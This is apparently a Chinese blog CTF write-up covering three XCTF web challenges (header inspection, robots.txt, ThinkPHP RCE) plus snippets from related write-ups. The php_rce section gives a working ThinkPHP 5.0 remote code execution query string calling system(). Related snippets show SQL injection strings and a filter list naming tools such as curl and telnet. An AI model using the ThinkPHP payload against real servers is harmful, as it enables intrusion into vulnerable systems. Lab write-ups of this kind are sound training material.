[CTF]攻防世界web高手进阶区Writeup(更新ing)

最新推荐文章于 2022-04-26 16:51:34 发布
最新推荐文章于 2022-04-26 16:51:34 发布
阅读量378 收藏 2
点赞数
分类专栏: CTF 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46245322/article/details/105319340
版权

baby_web

EMMMM,这就是一个签到题~

解题方法:

F12→Networks→刷新抓包→完成

Training-WWW-Robots

 

看题目可以知道这道题考的是爬虫协议(robots.txt文件)的知识

打开网页,果然~

他在网页里还暗示了一下,Sometimes these files reveal the directory structure instead protecting the content from being crawled.(有时这些文件暴露了目录结构,而不是保护内容被抓取。)

好吧!我们直接打开robots.txt看看吧

好嘛~ 够直接的。。。

接下来就没啥说的,直接访问fl0g.php这个页面就可以了

到这里我们就拿到了这道题的FLAG!

 

推荐相关文章

《关于robots.txt文件的安全问题》

《robots.txt文件问题攻略大全》

 

php_rce

 

打开后,提示使用的thinkphp v5.0版本

然后根据题目提示直接谷歌thinkphp rce漏洞,推荐文章《THINKPHP 5.X RCE 漏洞分析与利用总结

然后直接构造payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27

得到FLAG!

 

相关文章推荐:

说说RCE那些事儿

ThinkPHP5 RCE漏洞重现及分析

点进来的小伙伴想学习更多网络安全知识就请关注我的公众号吧🤭

0pen1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-web高手
zji
04-25 4845
文章目录攻防世界-web高手一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页去后,看到了robots.txt去看到一个可以看到他有一个不允许访问的文件f10g.php,在
ctfweb攻防工具-御剑1.5.7z
04-06
御剑1.5版本
攻防世界—-(web)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界(web)高手
doraemon12345的博客
12-01 202
1.baby_web 打开题目,题目描述提示想想初始页面,打开是1.php, 改成index.php,开发者模式,选择在网络模块打开看到index.php,查找发现flag flag{very_baby_web} 2.Training-WWW-Robots 看到题目想到robots.txt,尝试一下果然,看到fl0g.php 打开fl0g.php,拿到flag cyberpeace{27ec35e088ca35fa208f904330c15aad} 3.warmup 打开题目是个滑稽的表情,f12发现sou
攻防世界Web高手
xuhc25的博客
05-07 468
攻防世界Web高手 文章目录1、aNNaNNaNNaN-Batman 1、aNNaNNaNNaN-Batman 题目: 下载下来得到附件,解压。 用txt打开 发现是一个JavaScript脚本。 看着有些乱码,试看看弹窗内容,把末尾的eval改成alert,然后后缀改为html。 双击浏览器打开,就能看到弹出内容。 这回看到是正经的代码了,整理得到如下代码。 function $(){ var e=document.getElementByld("c").value; if(e.
【HackPack CTFWEB——持续更新
12-21
题目地址 ...打开是酱紫 sui便打开一个404找不到 先演示错误思路: Plan A.... 上bp抓包,Ctrl + I,爆破点为/后的数字比如1,sniper狙击手模式, ...playload 用runtime file ...换思路,找宝藏,要想有地图,hi
De1ctf 2020 -‘check in’ writeup
01-09
这道题很有意思,考察知识点:.htaccess文件上传、改文件type、字符匹配的绕过 文件内容过滤了很多字符 perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents! ...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
CTF——攻防世界第一篇
01-08
昨天下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的中文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。所以,今天,我决定...
攻防世界web高手 Web_php_include
weixin_61835841的博客
04-25 1965
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 工具 火狐,burpsuite 分析 代码审计: strstr():分大小写 str_replace:替换函数 补充: 函数原型:mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )参数说明:$search要被搜索替换的字符串,$replace要替换搜索的字符串,$subject操作...
攻防世界——web高手(1~6)
weixin_52805837的博客
03-09 613
攻防世界——web高手(1~6) (1)baby_web: 1.根据提示,在url中输入index.php,发现打开的仍然还是1.php 2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag (2)Training-WWW-Robots: 直接先访问robots.txt: 然后在url在输入/fl0g.php,得到flag (3)Web_python_template_injection: 首先构造/{
攻防世界Web高手WP(1-4)
00勇士王子的博客
07-24 488
1.baby_web 题目描述中提到初始页面,一般都是 index.php 入题目环境,可以看到是1.php 将1.php改成inex.php,然后发现页面直接跳转到1.php了 那就F12查看网页响应情况,再次访问index.php,然后发现确实访问index.php了,在返回的响应头中发现flag。 flag{very_baby_web} 2.Training-WWW-Robots 打开题目环境,一堆英文,看不懂 翻译一下 和之前新手练习第二题一样,考察robots协议,直接访问 i
攻防世界-web-高手-unserialize3
wyj_1216 House
07-10 874
题目 writeup class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } 分析上述代码,发现:_wakeup() 考虑反序列化 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exi...
xctf攻防世界 Web高手 Zhuanxv
l8947943的博客
01-07 1264
1.入环境,查看内容 没有什么其他信息,尝试dirsearch一下,如图: 发现有/list页面,我们尝试一下,发现让登录,如图: 猜测是需要想办法登入,从而拿到flag 2.问题分析 对内容行抓包 先forward,然后再通过action送入repeater,如图: 发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图: 通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的
攻防世界_WEB_高手_DAY1
weixin_43898134的博客
04-11 334
第一题 baby_web 题目描述:想想初始页面是哪个 首先想到index.php,我们试一下,发现可以去,然后就看看各种文件,最后在Network中找到了。 第二题 Training-WWW-Robots 这道题和新手村的robots那道题一样。我们先看看它不让访问哪个页面 FLAG就藏在此处 ...
攻防世界-web-高手1-ics-06
wyj_1216 House
07-06 2881
题目 writeup 首先打开这个界面,看起来好高大上 随便点点 发先报表中心可以点去界面 一开始还以为sql注入 尝试好多,没有回显 结果最后发现是爆破(哭) 爆破常规操作一波 得到当id=2333时,得到flag 知识点 爆破: https://blog.csdn.net/wyj_1216/article/details/90452373 见0x03Weak_auth ...
攻防世界web高手 supersqli
weixin_61835841的博客
04-26 364
提示:方法千千万,适合自己才是最强的! 工具 火狐 分析 看题目--随便注,supersqli 以及网页内容猜测是sql注入 1.输入1,发现变量为inject 2.查看网页源代码,发现提示sqlmap没有灵魂,意识到应该不能用sqlmap跑,尝试手工注入 3.输入 1' union select 1--+ 提示被过滤,preg_match可自行百度,过滤之后则不能用select这条命令 4,尝试堆叠注入 Stacked injections(堆叠注入)从名词的含义..
攻防世界web高手(二)
weixin_44866139的博客
03-17 542
supersqli 题目提示随便住,输入1’题目报错说多了一个分号,存在sql注入 输入1’#,返回正确 1’ order by 2# 1’ order by 3#,返回错误,说明有两列 联合查询,发现select字段被过滤了 当关键字被过滤时可以尝试堆叠注入 方法一:堆叠注入 -1’;show tables#,–+好像被过滤了 1、查看字段 -1’;show columns from 1919...
buu ctf web]ssti
最新发布
08-23
在buu ctf web中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值